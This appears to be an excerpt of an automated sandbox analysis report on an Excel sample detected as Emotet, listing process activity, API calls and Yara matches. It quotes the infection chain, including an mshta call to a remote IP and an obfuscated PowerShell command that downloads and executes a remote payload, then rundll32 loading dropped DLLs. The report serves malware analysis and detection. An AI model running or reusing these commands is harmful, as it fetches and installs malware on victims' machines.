Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\mshta.exe TID: 1832

Thread sleep time: -360000s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 3.2 %

Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_9-32093
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_11-32093

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 0000000C.00000002.564500652.000000000057A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,

9_2_10030334

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,		9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,		11_2_10021854

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

9_2_1003D873

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00354087 mov eax, dword ptr fs:[00000030h]	9_2_00354087
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F4087 mov eax, dword ptr fs:[00000030h]	10_2_001F4087
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00214087 mov eax, dword ptr fs:[00000030h]	11_2_00214087
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002E4087 mov eax, dword ptr fs:[00000030h]	12_2_002E4087
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B14087 mov eax, dword ptr fs:[00000030h]	14_2_00B14087
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003B3487 mov eax, dword ptr fs:[00000030h]	15_2_003B3487
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00214087 mov eax, dword ptr fs:[00000030h]	15_2_00214087

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

9_2_10037657

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

9_2_10002280

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,	9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,	9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,	11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,	11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_1003ACCC

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/vvv/ppp/fe.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer	Jump to behavior

Source: Yara match	File source: 364453688149503140239183.xls, type: SAMPLE
Source: Yara match	File source: C:\Users\user\Desktop\364453688149503140239183.xls, type: DROPPED

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	11_2_10014B71

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_1003DAA7 cpuid

9_2_1003DAA7

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

9_2_1003906D

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

9_2_1003CE1A

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,

9_2_100453C8

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 12.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2e90000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2850000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.380000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.a30000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.b20000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2520000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.cc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2e00000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3020000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.a30000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.a30000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.b80000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2860000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2f40000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.470000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2e40000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2c90000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.24f0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.25e0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.440000.3.unpack, type: UNPACKEDPE
